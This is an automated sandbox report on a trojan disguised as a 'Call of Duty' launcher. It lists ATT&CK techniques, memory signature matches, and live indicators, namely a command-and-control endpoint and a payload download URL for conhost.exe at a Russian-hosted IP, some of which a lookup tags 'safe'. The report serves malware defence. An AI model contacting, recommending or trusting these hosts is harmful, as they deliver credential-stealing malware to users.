              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000002.00000003.1711652873.00000000035F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1711171222.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 7328, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol31
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager141
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS11
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials21
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Call 0f Duty A1 Launcher.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://property-imper.sbs/apic0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exefi0%Avira URL Cloudsafe
              https://property-imper.sbs/apiU0%Avira URL Cloudsafe
              http://147.45.47.81/0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exebsxn0%Avira URL Cloudsafe
              https://property-imper.sbs/apiG0%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exe0%Avira URL Cloudsafe
              http://147.45.47.81/f10%Avira URL Cloudsafe
              https://property-imper.sbs/apiWi.0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              property-imper.sbs
              104.21.33.116
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://property-imper.sbs/apifalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabCall 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://property-imper.sbs/apicCall 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgCall 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoCall 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://147.45.47.81/Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://147.45.47.81/f1Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaCall 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://property-imper.sbs/apiUCall 0f Duty A1 Launcher.exe, 00000002.00000003.1756574371.00000000035E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://property-imper.sbs/apiWi.Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1861877709.00000000035C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.rootca1.amazontrust.com0:Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://147.45.47.81/conhost.exebsxnCall 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714414750.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAC000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734750561.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1734966106.0000000005DA5000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005DA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://147.45.47.81/conhost.exeCall 0f Duty A1 Launcher.exe, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.0000000003543000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090339829.0000000003543000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.ecosia.org/newtab/Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://property-imper.sbs/Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089619359.000000000356F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCall 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://ac.ecosia.org/autocomplete?q=Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://147.45.47.81/conhost.exefiCall 0f Duty A1 Launcher.exe, 00000002.00000003.2089761018.00000000035C6000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090421704.00000000035C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://property-imper.sbs/apiGCall 0f Duty A1 Launcher.exe, 00000002.00000003.1780276053.00000000035F5000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000002.2090524396.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1821410726.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.2089564512.00000000035FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgCall 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiCall 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.c.lencr.org/0Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.i.lencr.org/0Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCall 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCall 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.microsofCall 0f Duty A1 Launcher.exe, 00000002.00000003.1713948683.0000000005DAE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Call 0f Duty A1 Launcher.exe, 00000002.00000003.1756932659.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesCall 0f Duty A1 Launcher.exe, 00000002.00000003.1714245513.0000000005D80000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.mozilla.org/products/firefoxgro.allCall 0f Duty A1 Launcher.exe, 00000002.00000003.1757977041.0000000005E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712840445.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, Call 0f Duty A1 Launcher.exe, 00000002.00000003.1712538859.0000000005D7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Call 0f Duty A1 Launcher.exe, 00000002.00000003.1758407207.00000000035F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          104.21.33.116
                                                                          property-imper.sbsUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          147.45.47.81
                                                                          unknownRussian Federation
                                                                          2895FREE-NET-ASFREEnetEUfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1561495
                                                                          Start date and time:2024-11-23 15:05:07 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 4m 55s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:6
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Call 0f Duty A1 Launcher.exe
                                                                          Detection:MAL
                                                                          Classification:mal92.troj.spyw.evad.winEXE@4/0@1/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 83%
                                                                          • Number of executed functions: 14
                                                                          • Number of non-executed functions: 33
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Stop behavior analysis, all processes terminated
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target Call 0f Duty A1 Launcher.exe, PID 7328 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: Call 0f Duty A1 Launcher.exe
                                                                          TimeTypeDescription
                                                                          09:05:59API Interceptor8x Sleep call for process: Call 0f Duty A1 Launcher.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.33.116Aura.exeGet hashmaliciousUnknownBrowse
                                                                            injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                          Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              147.45.47.81Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 147.45.47.81/conhost.exe
                                                                                              n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                              • 147.45.47.81/WinRing0x64.sys
                                                                                              PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                              • 147.45.47.81/WinRing0x64.sys
                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.47.81/conhost.exe
                                                                                              Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 147.45.47.81/conhost.exe
                                                                                              inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                              • 147.45.47.81/conhost.exe
                                                                                              BlazeHack.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
                                                                                              • 147.45.47.81/WinRing0x64.sys
                                                                                              CKHSihDX4S.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                              • 147.45.47.81/WinRing0x64.sys
                                                                                              XXZahG4d9Z.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                              • 147.45.47.81/WinRing0x64.sys
                                                                                              n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                                                                                              • 147.45.47.81/WinRing0x64.sys
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.162.84
                                                                                              Aura.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.33.116
                                                                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.162.84
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.33.116
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.33.116
                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.162.84
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.162.84
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.33.116
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSarcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.155.47
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.223.140
                                                                                              unturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                              • 104.26.13.205
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.70.128
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.162.84
                                                                                              xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.155.47
                                                                                              Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.198.61
                                                                                              Aura.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.33.116
                                                                                              injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.88.250
                                                                                              injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.44.93
                                                                                              FREE-NET-ASFREEnetEUScript.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 147.45.47.81
                                                                                              https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 147.45.178.112
                                                                                              http://147.45.47.98/js/error.jsGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.47.98
                                                                                              hmips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 193.233.193.45
                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 193.233.193.45
                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 193.233.193.45
                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                              • 193.233.193.45
                                                                                              owari.mips.elfGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.234.212
                                                                                              pdusf6w2SJ.exeGet hashmaliciousRedLineBrowse
                                                                                              • 147.45.44.221
                                                                                              ppc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 193.233.193.45
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1arcaneloader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.33.116
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.33.116
